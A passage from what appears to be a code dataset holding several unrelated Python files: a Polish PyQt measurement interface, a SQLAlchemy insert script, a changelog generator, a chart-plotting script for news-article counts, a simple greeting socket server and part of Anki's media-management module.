4-punktowy------\n self.R4_temperatura.setText(_translate(\"MainWindow\", \"0\"))\n self.R4_wybor_osix_p.setItemText(0, _translate(\"MainWindow\", \"t [s]\"))\n self.R4_wybor_osix_p.setItemText(1, _translate(\"MainWindow\", \"T [K]\"))\n\n self.R4_tempo.setText(_translate(\"MainWindow\", \"0\"))\n self.R4_wybor_kanalow_t.setCurrentText(_translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_t.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.R4_wybor_kanalow_t.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.R4_wybor_kanalow_t.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.R4_wybor_kanalow_t.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_t.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.R4_wybor_kanalow_t.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.R4_wybor_kanalow_t.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.R4_wybor_kanalow_t.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.R4_wybor_kanalow_t.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.R4_wybor_kanalow_t.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.R4_wybor_kanalow_t.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.R4_wybor_kanalow_t.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.R4_wybor_kanalow_t.setItemText(12, _translate(\"MainWindow\", \"13\"))\n self.R4_wybor_kanalow_t.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.R4_wybor_kanalow_t.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.R4_wybor_kanalow_t.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.R4_wybor_kanalow_t.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.R4_wybor_kanalow_t.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.R4_wybor_kanalow_t.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.R4_wybor_kanalow_t.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.R4_wybor_kanalow_tekst_p.setText(_translate(\"MainWindow\", \"Wybór kanału\"))\n self.R4_zakres_p.setCurrentText(_translate(\"MainWindow\", \"100 R\"))\n self.R4_zakres_p.setItemText(0, _translate(\"MainWindow\",\"100 R\"))\n self.R4_zakres_p.setItemText(1, _translate(\"MainWindow\",\"1 k\"))\n self.R4_zakres_p.setItemText(2, _translate(\"MainWindow\", \"10 k\"))\n self.R4_zakres_p.setItemText(3, _translate(\"MainWindow\", \"100 k\"))\n self.R4_zakres_p.setItemText(4, _translate(\"MainWindow\", \"1 M\"))\n self.R4_zakres_p.setItemText(5, _translate(\"MainWindow\", \"10 M\"))\n self.R4_zakres_p.setItemText(6, _translate(\"MainWindow\", \"100 M\")) \n\n 
self.R4_skala_log_p.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.R4_tempo_tekst.setText(_translate(\"MainWindow\", \"Tempo przyrostu temperatury [K/min.]:\"))\n self.R4_czestotliowsc_tekst.setText(_translate(\"MainWindow\", \"Częstotliwość próbkowania [s]\"))\n self.R4_sledzenie_temp_tekst.setText(_translate(\"MainWindow\", \"Automatyczne śledzenie temperatury [K]\"))\n self.R4_zakres_tekst.setText(_translate(\"MainWindow\", \"Zakres:\"))\n self.R4_moc_tekst.setText(_translate(\"MainWindow\", \"Moc grzałki [%]:\"))\n self.R4_wybor_kanalow_tekst_t.setText(_translate(\"MainWindow\", \"Wybór kanału\"))\n self.R4_wybor_kanalow_p.setCurrentText(_translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_p.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.R4_wybor_kanalow_p.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.R4_wybor_kanalow_p.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.R4_wybor_kanalow_p.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_p.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.R4_wybor_kanalow_p.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.R4_wybor_kanalow_p.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.R4_wybor_kanalow_p.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.R4_wybor_kanalow_p.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.R4_wybor_kanalow_p.setItemText(9, _translate(\"MainWindow\", \"10\"))\n\n self.R4_moc.setText(_translate(\"MainWindow\", \"0\"))\n self.R4_wybor_osix_tekst_p.setText(_translate(\"MainWindow\", \"Dane osi X:\"))\n self.R4_skala_log_t.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.R4_temperatura_tekst.setText(_translate(\"MainWindow\", \"Aktualna temperatura [K]:\"))\n self.R4_start.setText(_translate(\"MainWindow\", \"Start\"))\n self.R4_reset.setText(_translate(\"MainWindow\", \"Reset\"))\n self.R4_licznik.setText(_translate(\"MainWindow\", \"00:00\"))\n #--------------->\n\n\n #<----tryb reczny--- \n self.label_1.setText(_translate(\"MainWindow\", \"Kanał 1\"))\n self.comboBox_1.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_1.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_11.setText(_translate(\"MainWindow\", \"Kanał 11\"))\n self.comboBox_11.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_11.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_2.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_2.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Kanał 2\"))\n self.label_12.setText(_translate(\"MainWindow\", \"Kanał 12\"))\n self.comboBox_12.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_12.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Kanał 3\"))\n self.comboBox_3.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_3.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_13.setText(_translate(\"MainWindow\", \"Kanał 13\"))\n self.comboBox_13.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_13.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Kanał 4\"))\n self.comboBox_4.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_4.setItemText(1, _translate(\"MainWindow\", \"Opór 
[Ohm]\"))\n self.label_14.setText(_translate(\"MainWindow\", \"Kanał 14\"))\n self.comboBox_14.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_14.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_5.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_5.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Kanał 5\"))\n self.comboBox_15.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_15.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_15.setText(_translate(\"MainWindow\", \"Kanał 15\"))\n self.comboBox_6.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_6.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_6.setText(_translate(\"MainWindow\", \"Kanał 6\"))\n self.label_16.setText(_translate(\"MainWindow\", \"Kanał 16\"))\n self.comboBox_16.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_16.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_7.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_7.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_7.setText(_translate(\"MainWindow\", \"Kanał 7\"))\n self.label_17.setText(_translate(\"MainWindow\", \"Kanał 17\"))\n self.comboBox_17.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_17.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_8.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_8.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_8.setText(_translate(\"MainWindow\", \"Kanał 8\"))\n self.label_18.setText(_translate(\"MainWindow\", \"Kanał 18\"))\n self.comboBox_18.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_18.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_9.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_9.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_9.setText(_translate(\"MainWindow\", \"Kanał 9\"))\n self.comboBox_19.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_19.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_19.setText(_translate(\"MainWindow\", \"Kanał 19\"))\n self.comboBox_10.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_10.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_10.setText(_translate(\"MainWindow\", \"Kanał 10\"))\n self.label_20.setText(_translate(\"MainWindow\", \"Kanał 20\"))\n self.comboBox_20.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_20.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.CH20_skala_log.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.CH20_czestotliowsc_in_tekst.setText(_translate(\"MainWindow\", \"Okres między kanałami [s]\"))\n self.CH20_czestotliowsc_out_tekst.setText(_translate(\"MainWindow\", \"Okres między seriami [s]\"))\n self.CH20_start.setText(_translate(\"MainWindow\", \"Start\"))\n self.CH20_reset.setText(_translate(\"MainWindow\", \"Reset\"))\n self.CH20_licznik.setText(_translate(\"MainWindow\", \"00:00\"))\n #----------------->\n \n #<--------------inne-----------\n self.zmiana_trybu.setItemText(0, _translate(\"MainWindow\", \"Pomiar oporu w funkcji temeperatury\"))\n 
self.zmiana_trybu.setItemText(1, _translate(\"MainWindow\", \"Pomiar 4-punktowy\"))\n self.zmiana_trybu.setItemText(2, _translate(\"MainWindow\", \"Ręczny\"))\n self.zmiana_trybu_tekst.setText(_translate(\"MainWindow\", \"Tryb: \"))\n self.naglowek.setText(_translate(\"MainWindow\", \"Nazwa_pomiaru\"))\n self.nazwa_pliku_tekst.setText(_translate(\"MainWindow\", \"Nazwa pliku wyjściowego:\"))\n self.nazwa_pliku_przedrostek.setText(_translate(\"MainWindow\", \"data_\"))\n self.Ustawienia.setText(_translate(\"MainWindow\", \"Ustawienia\"))\n self.Pomoc.setText(_translate(\"MainWindow\", \"Pomoc\"))\n #--------->\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())","repo_name":"Ukasz-Witkowski/pomiar_oporu","sub_path":"program/interfejs.py","file_name":"interfejs.py","file_ext":"py","file_size_in_byte":81513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7156098621","text":"#!/usr/bin/python3\n\"\"\"\nPYTHON OBJECT RELATIONAL MAPPING MODULE\n\nmodel_state_insert module provides function to add an State object to the DB.\n\"\"\"\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef model_state_insert():\n \"\"\"\n Adds the State object “Louisiana” to the database.\n\n Takes 3 arguments: mysql username, mysql password and database name.\n \"\"\"\n\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1], sys.argv[2], sys.argv[3]), pool_pre_ping=True)\n Base.metadata.create_all(engine)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_state = State()\n new_state.name = 'Louisiana'\n session.add(new_state)\n session.commit()\n print(new_state.id)\n\n session.close()\n\n\nif __name__ == \"__main__\":\n model_state_insert()\n","repo_name":"gorgyboy/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27473297399","text":"import enum\n\nimport click\nimport numpy as np\nimport pandas as pd\n\n\n@enum.unique\nclass Area(enum.Enum):\n core = 'core'\n tests = 'tests'\n build = 'build'\n apps = 'apps'\n docs = 'docs'\n\n\ndef define_area(msg):\n areas = [e.value for e in Area]\n\n for area in areas:\n if msg.startswith(f'[{area}] '):\n return area\n\n return np.NaN\n\n\ndef delete_prefix(msg):\n prefixes = [f'[{e.value}] ' for e in Area]\n\n for prefix in prefixes:\n if msg.startswith(prefix):\n return msg[len(prefix):]\n\n return msg[:]\n\n\ndef write_into_changelog(df, f):\n f.write('\\n')\n for _, row in df.iterrows():\n f.write(f\"\\n{row['commit']} {row['message']}\")\n f.write('\\n')\n\n\n@click.command()\n@click.argument(\n 'git_log',\n type=click.Path(exists=True)\n)\ndef main(git_log):\n \"\"\" Script designed to create changelog out of .csv SRT git log \"\"\"\n\n df = pd.read_csv(git_log, sep = '|', names = ['commit', 'message', 'author', 'email'])\n df['area'] = df['message'].apply(define_area)\n df['message'] = df['message'].apply(delete_prefix)\n\n core = df[df['area']=='core']\n tests = df[df['area']=='tests']\n build = df[df['area']=='build']\n apps = df[df['area']=='apps']\n docs = 
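The `model_state_insert` record just above adds one `State` row and prints its id. A companion read-back sketch in the same style (the query itself is an assumed usage example; the `model_state` module and the argv-based connection string come from the original):

```python
#!/usr/bin/python3
"""Sketch: fetch the row created by model_state_insert()."""
import sys
from model_state import State
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

if __name__ == "__main__":
    engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(
        sys.argv[1], sys.argv[2], sys.argv[3]), pool_pre_ping=True)
    session = sessionmaker(bind=engine)()
    # look up the row inserted by the script above
    state = session.query(State).filter_by(name='Louisiana').first()
    if state is not None:
        print("{}: {}".format(state.id, state.name))
    session.close()
```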
df[df['area']=='docs']\n    other = df[df['area'].isna()]\n\n    with open('changelog.md', 'w') as f:\n        f.write('# Release Notes\\n')\n\n        f.write('\\n## Changelog\\n')\n        f.write('\\n<details><summary>Click to expand/collapse</summary>')\n        f.write('\\n<p>')\n        f.write('\\n')\n\n        if not core.empty:\n            f.write('\\n### Core Functionality')\n            write_into_changelog(core, f)\n\n        if not tests.empty:\n            f.write('\\n### Unit Tests')\n            write_into_changelog(tests, f)\n\n        if not build.empty:\n            f.write('\\n### Build Scripts (CMake, etc.)')\n            write_into_changelog(build, f)\n\n        if not apps.empty:\n            f.write('\\n### Sample Applications')\n            write_into_changelog(apps, f)\n\n        if not docs.empty:\n            f.write('\\n### Documentation')\n            write_into_changelog(docs, f)\n\n        if not other.empty:\n            f.write('\\n### Other')\n            write_into_changelog(other, f)\n\n        f.write('\\n</p>')\n        f.write('\\n</details>
')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hwangsaeul/libsrt","sub_path":"scripts/changelog/changelog.py","file_name":"changelog.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"14624948087","text":"\n#%%\n\n# ---> Clear all items in memory:\n\nprint(\"\\nClearing all data in memory...\")\n\nfrom IPython import get_ipython\nget_ipython().magic('reset -f')\n\n\n#%%\n\n\n# -----------------------------------------------------------------------------\n### ----------------------------- Cargar paquetes -----------------------------\n# -----------------------------------------------------------------------------\n\n\n#%% \n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nimport time\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\n\n\nstart_time = time.time()\n\n\nprint(\"\\nStarting program...\")\n\n\n#%%\n\n# 1) ---> Definir parametros:\n \n \nuser = r\"\\srjc2\"\n\nnombre_base = \"\\\\WS - Consolidado articulos.xlsx\"\n\npath = r\"C:\\Users\" + user + r\"\\OneDrive\\Documentos\\GitHub\\MCPP_juan.salgado\\Proyecto final\"\n\npath_base = path + r\"\\0_Base_consolidada\"\n\npath_nlp = path + r\"\\2_NLP\"\n\noutput = path + r\"\\3_Output\"\n\n\ndf = pd.read_excel(path_nlp + r\"\\merge_bases.xlsx\")\n\ndf2 = pd.read_excel(path_base + r\"\\WS - Consolidado articulos.xlsx\")\n\ndf['day'] = 1\n\ndf.rename(columns={\"Anio\": \"year\", \"Mes\": \"month\"}, inplace = True)\n\ndf = df[df.year != 2019]\n\ndf['date'] = pd.to_datetime(df[['year', 'month', 'day']])\n\n\n#%%\n\n# ---> Analisis de los articulos\n\n# 1) ---> Articulos por dia\n\ngrouped_dates = df.groupby(df['date'].apply(lambda x : x.date()))\n\ngrouped_dates = grouped_dates['date'].aggregate(len)\n\n#grouped_dates.plot.line()\n\nax = grouped_dates.plot(color = \"chocolate\")\n\n# _ = plt.xticks(rotation=90, )\n_ = plt.grid()\n_ = plt.xlabel('Años')\n_ = plt.ylabel('Cantidad articulos')\n_ = plt.title('Total articulos recopilados')\n_ = plt.rc('xtick', labelsize=6)\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 10,\n 'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_1.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 2) ---> Articulos por medio\n\ngrouped_medios = df2.groupby(['Medio']).size()\n\nax = grouped_medios.sort_values(ascending=True).plot(color = \"darkcyan\",\n kind='barh')\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.grid()\n_ = plt.xlabel('Cantidad articulos')\n_ = plt.ylabel('Medios')\n_ = plt.title('Total articulos por medio')\n_ = plt.rc('xtick', labelsize=6)\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 10,\n 'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_2.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 2) ---> Articulos por palabra\n\ngrouped_pals = df2.groupby(['Palabra buscada']).size()\n\nax = grouped_pals.sort_values(ascending=True).plot(color = \"y\",\n kind='barh')\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.tight_layout()\n_ = plt.grid()\n_ = plt.xlabel('Cantidad articulos')\n#_ = plt.ylabel('Palabra buscada')\n#_ = plt.title('Total articulos por palabra buscada')\n_ = plt.rc('xtick', labelsize=6)\n\ny_axis = ax.axes.get_yaxis()\ny_label = y_axis.get_label()\ny_label.set_visible(False)\n\nx_axis = ax.axes.get_xaxis()\nx_label = x_axis.get_label()\nx_label.set_visible(False)\n\n\n_ = plt.rc('ytick', labelsize=6)\nparams = 
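The plotting script that begins above opens a fresh `PdfPages` per chart, yielding one single-page PDF per figure (`graph_1.pdf` … `graph_5.pdf`). The same class also supports a single multi-page file; a minimal sketch of that variant, reusing the script's `output` path and grouped series as stand-ins:

```python
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages

# One multi-page PDF instead of graph_1.pdf ... graph_5.pdf
with PdfPages(output + '\\all_graphs.pdf') as pdf:
    for title, series in [('Total articulos recopilados', grouped_dates),
                          ('Total articulos por medio', grouped_medios)]:
        fig, ax = plt.subplots()
        series.plot(ax=ax)
        ax.set_title(title)
        pdf.savefig(fig)  # appends one page per figure
        plt.close(fig)
```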
{'legend.fontsize': 10,\n          'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_3.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 4) ---> Descripcion crimenes\n\ncrimes = ['Violenciasexual', 'Homicidio', 'Hurto',\n          'Extorsion', 'Secuestro', 'date']\n\ncrimes2 = ['Violenciasexual', 'Homicidio', 'Hurto',\n          'Extorsion', 'Secuestro']\n\ndf_crimes = df[crimes]\n\ngrouped_crimes = df_crimes.groupby('date').sum()\n\ngrouped_crimes.reset_index(inplace=True)\n\nax = grouped_crimes.plot(x=\"date\", y=crimes2)\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.tight_layout()\n_ = plt.grid()\n_ = plt.xlabel('Años')\n_ = plt.ylabel('Cantidad articulos')\n#_ = plt.title('Total articulos clasificados en crimenes')\n_ = plt.rc('xtick', labelsize=6)\n\n\ny_axis = ax.axes.get_yaxis()\ny_label = y_axis.get_label()\ny_label.set_visible(False)\n\n\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 7,\n          'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_4.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 4) ---> Descripcion crimenes\n\ncrimes = ['Venezolano', 'Crimenorganizado', 'date']\n\ncrimes2 = ['Venezolano', 'Crimenorganizado']\n\ndf_crimes = df[crimes]\n\ngrouped_crimes = df_crimes.groupby('date').sum()\n\ngrouped_crimes.reset_index(inplace=True)\n\nax = grouped_crimes.plot(x=\"date\", y=crimes2)\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.tight_layout()\n_ = plt.grid()\n_ = plt.xlabel('Años')\n_ = plt.ylabel('Cantidad articulos')\n#_ = plt.title('Total articulos clasificados en crimenes')\n_ = plt.rc('xtick', labelsize=6)\n\n\ny_axis = ax.axes.get_yaxis()\ny_label = y_axis.get_label()\ny_label.set_visible(False)\n\n\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 7,\n          'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_5.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n\n\n","repo_name":"juansalg/MCPP_juan.salgado","sub_path":"Proyecto final/2_NLP/Codigos/4. Graficos.py","file_name":"4. Graficos.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"31758878873","text":"import socket\r\n\r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nhost='192.168.0.103'\r\nport = 8000\r\ns.bind((host,port))\r\ns.listen(1000)\r\nclients =[]\r\nmsg=\"Thanks for connecting to this server\"\r\n\r\n\r\nprint(\"Listening for connections....\")\r\nwhile True:\r\n    c,addr = s.accept()\r\n    print(addr,\" connected\")\r\n    clients.append(addr)\r\n    c.send(msg.encode())\r\n    \r\n    \r\n\r\n\r\ns.close()\r\n\r\n","repo_name":"winsecurity/python","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
{"seq_id":"74403406954","text":"__docformat__ = 'restructuredtext'\n\nimport os, stat, time, shutil, re, sys, urllib2\nfrom anki.db import *\nfrom anki.facts import Fact\nfrom anki.utils import addTags, genID, ids2str, checksum\nfrom anki.lang import _\n\nregexps = ((\"(\\\[sound:([^]]+)\\\])\",\n            \"[sound:%s]\"),\n           (\"(<img src=[\\\"']?([^\\\"'>]+)[\\\"']? 
?/?>)\",\n            \"<img src=\\\"%s\\\">\"))\n\n# Tables\n##########################################################################\n\nmediaTable = Table(\n    'media', metadata,\n    Column('id', Integer, primary_key=True, nullable=False),\n    Column('filename', UnicodeText, nullable=False),\n    Column('size', Integer, nullable=False),\n    Column('created', Float, nullable=False),\n    Column('originalPath', UnicodeText, nullable=False, default=u\"\"),\n    Column('description', UnicodeText, nullable=False, default=u\"\"))\n\nclass Media(object):\n    pass\n\nmapper(Media, mediaTable)\n\nmediaDeletedTable = Table(\n    'mediaDeleted', metadata,\n    Column('mediaId', Integer, ForeignKey(\"cards.id\"),\n           nullable=False),\n    Column('deletedTime', Float, nullable=False))\n\n# Helper functions\n##########################################################################\n\ndef mediaFilename(path):\n    \"Return checksum.ext for path\"\n    new = checksum(open(path, \"rb\").read())\n    ext = os.path.splitext(path)[1].lower()\n    return \"%s%s\" % (new, ext)\n\ndef copyToMedia(deck, path):\n    \"\"\"Copy PATH to MEDIADIR, and return new filename.\nUpdate media table. If file already exists, don't copy.\"\"\"\n    origPath = path\n    description = os.path.splitext(os.path.basename(path))[0]\n    newBase = mediaFilename(path)\n    new = os.path.join(deck.mediaDir(create=True), newBase)\n    # copy if not existing\n    if not os.path.exists(new):\n        if new.lower() == path.lower():\n            # case insensitive filesystems suck\n            os.rename(path, new)\n        else:\n            shutil.copy2(path, new)\n    newSize = os.stat(new)[stat.ST_SIZE]\n    if not deck.s.scalar(\n        \"select 1 from media where filename = :f\",\n        f=newBase):\n        # if the user has modified a hashed file, try to remember the old\n        # filename\n        old = deck.s.scalar(\n            \"select originalPath from media where filename = :s\",\n            s=os.path.basename(origPath))\n        if old:\n            origPath = old\n            description = os.path.splitext(os.path.basename(origPath))[0]\n        try:\n            path = unicode(path, sys.getfilesystemencoding())\n        except TypeError:\n            pass\n        deck.s.statement(\"\"\"\ninsert into media (id, filename, size, created, originalPath,\ndescription)\nvalues (:id, :filename, :size, :created, :originalPath,\n:description)\"\"\",\n                         id=genID(),\n                         filename=newBase,\n                         size=newSize,\n                         created=time.time(),\n                         originalPath=origPath,\n                         description=description)\n        deck.flushMod()\n    return newBase\n\ndef _modifyFields(deck, fieldsToUpdate, modifiedFacts, dirty):\n    factIds = ids2str(modifiedFacts.keys())\n    if fieldsToUpdate:\n        deck.s.execute(\"update fields set value = :val where id = :id\",\n                       fieldsToUpdate)\n    deck.s.statement(\n        \"update facts set modified = :time where id in %s\" %\n        factIds, time=time.time())\n    ids = deck.s.all(\"\"\"select cards.id, cards.cardModelId, facts.id,\nfacts.modelId from cards, facts where\ncards.factId = facts.id and facts.id in %s\"\"\"\n                     % factIds)\n    deck.updateCardQACache(ids, dirty)\n    deck.flushMod()\n\n\ndef mediaRefs(string):\n    \"Return list of (fullMatch, filename, replacementString).\"\n    l = []\n    for (reg, repl) in regexps:\n        for (full, fname) in re.findall(reg, string):\n            l.append((full, fname, repl))\n    return l\n\ndef stripMedia(txt):\n    for (reg, x) in regexps:\n        txt = re.sub(reg, \"\", txt)\n    return txt\n\n# Rebuilding DB\n##########################################################################\n\ndef rebuildMediaDir(deck, deleteRefs=False, dirty=True):\n    \"Delete references to missing files, delete unused files.\"\n    localFiles = {}\n    modifiedFacts = {}\n    unmodifiedFacts = {}\n    renamedFiles = {}\n    existingFiles = {}\n    factsMissingMedia = 
{}\n updateFields = []\n usedFiles = {}\n unusedFileCount = 0\n missingFileCount = 0\n deck.mediaDir(create=True)\n deck.startProgress(16, 0, _(\"Check Media DB\"))\n # rename all files to checksum versions, note non-renamed ones\n deck.updateProgress(_(\"Checksum files...\"))\n files = os.listdir(unicode(deck.mediaDir()))\n mod = len(files) / 10\n for c, oldBase in enumerate(files):\n if mod and not c % mod:\n deck.updateProgress()\n if oldBase.startswith(\"latex-\"):\n continue\n oldPath = os.path.join(deck.mediaDir(), oldBase)\n if oldBase.startswith(\".\"):\n continue\n if os.path.isdir(oldPath):\n continue\n newBase = copyToMedia(deck, oldPath)\n if oldBase.lower() == newBase.lower():\n existingFiles[oldBase] = 1\n else:\n renamedFiles[oldBase] = newBase\n deck.updateProgress(value=10)\n # now look through all fields, and update references to files\n deck.updateProgress(_(\"Scan fields...\"))\n for (id, fid, val) in deck.s.all(\n \"select id, factId, value from fields\"):\n oldval = val\n for (full, fname, repl) in mediaRefs(val):\n if fname in renamedFiles:\n # renamed\n newBase = renamedFiles[fname]\n val = re.sub(re.escape(full), repl % newBase, val)\n usedFiles[newBase] = 1\n elif fname in existingFiles:\n # used & current\n usedFiles[fname] = 1\n else:\n # missing\n missingFileCount += 1\n if deleteRefs:\n val = re.sub(re.escape(full), \"\", val)\n else:\n factsMissingMedia[fid] = 1\n if val != oldval:\n updateFields.append({'id': id, 'val': val})\n modifiedFacts[fid] = 1\n else:\n if fid not in factsMissingMedia:\n unmodifiedFacts[fid] = 1\n # update modified fields\n deck.updateProgress(_(\"Modify fields...\"))\n if modifiedFacts:\n _modifyFields(deck, updateFields, modifiedFacts, dirty)\n # fix tags\n deck.updateProgress(_(\"Update tags...\"))\n if dirty:\n deck.deleteTags(unmodifiedFacts.keys(), _(\"MediaMissing\"))\n if deleteRefs:\n deck.deleteTags(modifiedFacts.keys(), _(\"MediaMissing\"))\n else:\n deck.addTags(factsMissingMedia.keys(), _(\"MediaMissing\"))\n # build cache of db records\n deck.updateProgress(_(\"Delete unused files...\"))\n mediaIds = dict(deck.s.all(\"select filename, id from media\"))\n # look through the media dir for any unused files, and delete\n for f in os.listdir(unicode(deck.mediaDir())):\n if f.startswith(\".\"):\n continue\n if f.startswith(\"latex-\"):\n continue\n path = os.path.join(deck.mediaDir(), f)\n if os.path.isdir(path):\n shutil.rmtree(path)\n continue\n if f in usedFiles:\n del mediaIds[f]\n 